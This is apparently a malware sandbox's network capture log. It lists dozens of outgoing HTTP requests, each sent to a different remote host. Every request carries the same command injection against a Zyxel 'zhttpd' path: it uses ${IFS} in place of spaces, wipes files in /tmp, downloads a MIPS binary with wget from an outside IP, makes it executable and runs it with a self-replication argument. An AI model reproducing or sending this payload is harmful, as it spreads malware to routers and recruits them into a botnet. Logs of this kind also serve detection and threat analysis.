                                      Jan 14, 2024 15:50:49.373847961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5214192.168.2.144061841.40.18.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373929024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5215192.168.2.1457854217.161.132.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.373997927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5216192.168.2.1458932108.110.133.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.374038935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5217192.168.2.1458794165.123.103.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.374092102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5218192.168.2.1454338150.238.56.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.374145985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5219192.168.2.1443226174.254.14.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.374187946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5220192.168.2.145425242.30.105.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.374243021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5221192.168.2.1453708170.246.86.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.374278069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5222192.168.2.1458278206.124.172.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.374336004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5223192.168.2.1447816176.51.219.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.391603947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5224192.168.2.1447614118.168.217.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.391650915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5225192.168.2.1445226201.4.158.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.391794920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5226192.168.2.1454096219.114.201.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.391833067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5227192.168.2.1454266146.173.69.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.391895056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5228192.168.2.143707212.147.221.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.391952991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5229192.168.2.145590845.168.227.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392009020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5230192.168.2.1457162168.122.144.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392046928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5231192.168.2.144412489.65.253.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392103910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5232192.168.2.145696691.197.55.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392174959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5233192.168.2.1439008199.234.46.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392199039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5234192.168.2.1445140175.174.20.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392263889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5235192.168.2.1460484104.18.221.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392328024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5236192.168.2.1453502119.34.148.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392369032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5237192.168.2.1447324160.43.46.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392437935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5238192.168.2.1459110123.9.74.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392483950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5239192.168.2.145832693.99.247.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392534971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5240192.168.2.145107679.38.203.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392580986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5241192.168.2.146017842.121.25.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392633915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5242192.168.2.1435222172.99.205.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392678976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5243192.168.2.144068476.221.12.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392735004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5244192.168.2.1432950192.149.219.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392813921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5245192.168.2.1445518216.198.210.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392885923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5246192.168.2.143841452.173.132.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392925024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5247192.168.2.1449504172.205.178.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.392997980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5248192.168.2.1440714144.111.159.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393074989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5249192.168.2.1459184183.74.214.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393116951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5250192.168.2.1443480193.49.36.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393171072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5251192.168.2.1434156146.163.231.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393203974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5252192.168.2.1458014177.145.23.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393265009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5253192.168.2.1435052197.70.118.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393317938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5254192.168.2.1432828154.35.206.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393368959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5255192.168.2.1445994137.65.108.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393428087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5256192.168.2.1435438166.192.124.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393471003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5257192.168.2.1450880171.140.150.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393524885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5258192.168.2.1455394101.238.82.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393589973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5259192.168.2.1460738172.127.103.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393639088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5260192.168.2.1437590156.170.196.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393687010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5261192.168.2.145819473.110.218.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393750906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5262192.168.2.1456628198.147.82.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393805981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5263192.168.2.1453700162.148.193.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393882990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5264192.168.2.1433238120.228.114.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393918037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5265192.168.2.1437964120.241.244.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.393959999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5266192.168.2.14603788.91.37.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394022942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5267192.168.2.144162696.6.220.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394078970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5268192.168.2.1440800164.167.25.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394143105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5269192.168.2.1452684143.48.88.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394191980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5270192.168.2.143848023.213.61.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394239902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5271192.168.2.1455594218.167.242.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394310951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5272192.168.2.14530621.176.224.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394340992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5273192.168.2.143446848.218.41.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394402981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5274192.168.2.145767832.68.230.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394459009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5275192.168.2.1445804154.113.40.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394491911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5276192.168.2.145672066.51.59.190443
                                      TimestampBytes transferredDirectionData
